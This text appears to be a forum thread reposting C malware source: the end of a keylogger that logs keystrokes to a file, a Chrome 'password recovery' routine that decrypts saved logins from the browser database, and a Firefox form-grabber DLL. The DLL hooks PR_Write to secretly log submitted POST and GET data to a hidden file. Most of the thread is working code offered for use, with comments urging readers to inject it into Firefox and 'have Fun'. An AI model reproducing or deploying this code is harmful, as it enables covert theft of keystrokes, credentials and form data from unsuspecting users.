"Window Creation Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // the message loop while(GetMessage(&msg, NULL, 0, 0) > 0) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } int LogKey(HANDLE hLog, UINT vKey) { DWORD dwWritten; BYTE lpKeyboard[256]; char szKey[32]; WORD wKey; char buf[32]; int len; // Convert virtual-key to ascii GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK); GetKeyboardState(lpKeyboard); len = 0; switch(vKey) { case VK_BACK: len = wsprintf(buf, "[BP]"); break; case VK_RETURN: len = 2; strcpy(buf, "\r\n"); break; case VK_SHIFT: break; default: if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1) len = wsprintf(buf, "%c", (char)wKey); else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0) len = wsprintf(buf, "[%s]", szKey); break; } // Write buf into the log if(len > 0) { if(!WriteFile(hLog, buf, len, &dwWritten, NULL)) return -1; } return 0; } Sursa: [C]GetRawInputData() keylogger
  24. Nytro
    [C] Google Chrome Password Recovery Author: Sacrificial /* * Google Chrome Password Recovery * * Coded by Sacrificial * Sacrificial2010@hotmail.com * */ void GetGoogleChrome() { char szPath[MAX_PATH]; sqlite3 *lpDatabase; sqlite3_stmt *lpStatement; const char *lpTail; char *szURL, *szUsername, *szPassword; DATA_BLOB DataIn, DataOut; SHGetSpecialFolderPath(0, szPath, 0x1C, 0); strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data"); if(GetFileAttributes(szPath) != 0xFFFFFFFF) { sqlite3_open(szPath, &lpDatabase); sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail); do { DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5); DataIn.cbData = sqlite3_column_bytes(lpStatement, 5); if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) { szURL = (char*)sqlite3_column_text(lpStatement, 0); szUsername = (char*)sqlite3_column_text(lpStatement, 3); szPassword = (char*)DataOut.pbData; szPassword[DataOut.cbData] = '\0'; // Do whatever you want with em; } } while(sqlite3_step(lpStatement) == SQLITE_ROW); } } Note: Its not the best coding, but it works, and like I said its old. It requires the SQLite libraries. For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data" For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data" Would be nice if you gave credits when using this code. Enjoy Sursa: [sNIPPET] Google Chrome Password Recovery
  25. Nytro
    [C] FireFox Formgrabber Author: datemme Heres an example for a Firefox Formgrabber: dllmain: #include "hookdll.cpp" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: Funktion(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } HookDll.cpp : // hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung. #include <iostream> #include <fstream> using namespace std; #pragma once #include <windows.h> #include <prio.h> #pragma comment (lib, "nspr4.lib") BYTE hook[6]; DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); BYTE jmp[6] = { 0xe9, //jmp 0x00, 0x00, 0x00, 0x00, //address 0xc3 }; //retn ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0); DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5); //((to)-(from)-5) memcpy(&jmp[1], &dwCalc, 4); //build the jmp WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0); return dwAddr; } BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0)) return TRUE; return FALSE; } int WriteLog(const char * Filename,char * Text) { ofstream File; //Names File as ofstream (for output to file) //Closes file File.open(Filename,ios::app); //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file File << Text; //Outputs to file File.close(); //Closes opened file SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL ); return 1; } PRInt32 cPR_Write( PRFileDesc *fd, const void *buf, PRInt32 amount) { UnHookFunction("nspr4.dll", "PR_Write", hook); PRInt32 hResult = PR_Write(fd,buf,amount); if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);}; if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);}; HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); return hResult; } extern "C" void __declspec(dllexport) Funktion() { HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); } //U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details //vc++ 2008 compiled in multibyte mode //inject it in FF and have Fun !!! //can be very usefull if u "forgot" your password on a website //advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both //you can ofcourse filter for special tags with slightly modification datemme Sursa: FireFox Formgrabber
×
×
  • Create New...